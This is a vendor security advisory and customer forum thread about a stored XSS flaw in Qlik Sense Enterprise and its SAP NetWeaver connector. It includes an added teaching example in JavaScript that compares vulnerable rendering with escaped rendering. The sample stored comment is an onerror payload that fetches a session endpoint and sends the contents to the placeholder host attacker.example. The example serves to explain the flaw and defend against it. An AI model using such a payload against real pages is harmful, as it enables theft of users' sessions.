A cross-site scripting (XSS) issue, caused by improper validation of user-supplied input, has been identified in Qlik Sense Enterprise and Qlik Connector for use with SAP NetWeaver. This could lead to arbitrary JavaScript being executed in the context of a user if they visit a malicious page or link controlled by the attacker.
This issue was found as part of the Qlik secure engineering program and no reports of it being exploited have been received.
All Qlik Sense Enterprise versions prior to the versions listed below:
This vulnerability is rated as high due to the possibility of privilege escalation.
The calculated CVSS score: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N 8.2 (High)
Due to improper validation of user-supplied input, an authenticated user may be able to insert arbitrary JavaScript into a page. Subsequent visitors to that page would then execute that JavaScript, allowing the attacker to perform actions in the context of those users.
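The mechanism described above, stored JavaScript that runs in every later visitor's browser, is illustrated by the following added example. It is generic code written for this page, not Qlik's code and not the affected Qlik component; the stored comments, the attacker payload and the host name attacker.example are constructed for the demonstration. It places the unsafe rendering of stored input next to the output-encoded version that neutralises it, so the difference can be run and checked offline with Node.

```javascript
// Added example (not Qlik's code): a generic stored XSS pattern and its fix.
// A page renders "comments" that were stored earlier. The constructed sample
// below plays the attacker's persisted input.
const STORED_COMMENTS = [                      // constructed sample data
  { author: 'alice', body: 'Looks good to me' },
  // The attacker's earlier submission, persisted unchanged by a server that
  // only checked length, not content (the "improper validation" in the text).
  // attacker.example is a placeholder host, not a real exfiltration target.
  { author: 'mallory',
    body: '<img src=x onerror="fetch(\'/api/session\').then(r=>r.text())' +
          '.then(t=>fetch(\'https://attacker.example/?s=\'+encodeURIComponent(t)))">' },
];

// Vulnerable: raw interpolation into HTML. Every later visitor's browser
// parses the attacker's markup and runs the onerror handler as that visitor,
// with that visitor's cookies and session.
function renderCommentsVulnerable(comments) {
  return comments
    .map(c => `<li><b>${c.author}</b>: ${c.body}</li>`)
    .join('\n');
}

// HTML-entity-encode the characters that can change parsing when a value is
// placed in element text or inside a double- or single-quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Hardened: every untrusted value is output-encoded for the HTML text context
// at the point of insertion, regardless of what validation happened on input.
// The stored payload is still there, but the browser now shows it as text.
function renderCommentsSafe(comments) {
  return comments
    .map(c => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join('\n');
}

// Crude indicator, used to compare the two renderings: does the HTML still
// carry an element with an event handler, or a script tag, that a browser
// would execute?
function containsActiveMarkup(html) {
  return /<[a-z]+\b[^>]*\bon[a-z]+\s*=/i.test(html) || /<script\b/i.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable rendering:\n' + renderCommentsVulnerable(STORED_COMMENTS));
  console.log('\nhardened rendering:\n' + renderCommentsSafe(STORED_COMMENTS));
}
```

Note that `escapeHtml` is correct only for the HTML text and quoted-attribute contexts; a value inserted into a JavaScript string, a URL or a CSS property needs the encoder for that context, and a Content-Security-Policy without `'unsafe-inline'` is the usual second layer so that a missed encoding does not immediately become code execution.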
Recommendation
All Qlik software can be downloaded from our official Qlik Download page (customer login required).
Hello,
It looks like the XSS issue was resolved in Qlik Sense version September 2020, by upgrading the jQuery version.
There is additional work being done in the May 2021 version. Just wanted to clarify: is that related only to the Qlik Connector for use with SAP NetWeaver?
We are using the extensions. With regard to the XSS issue, if we are not using Qlik Connector for use with SAP NetWeaver, are we okay with the September 2020 version, or do we have to upgrade to the May 2021 version?
Thank you!
Hello @pth21, it affects Qlik Sense Enterprise and the SAP NetWeaver connector. If you're on September 2020, you should upgrade to the latest patch for September 2020. The fix for the issue is in September 2020 Patch 12 and above.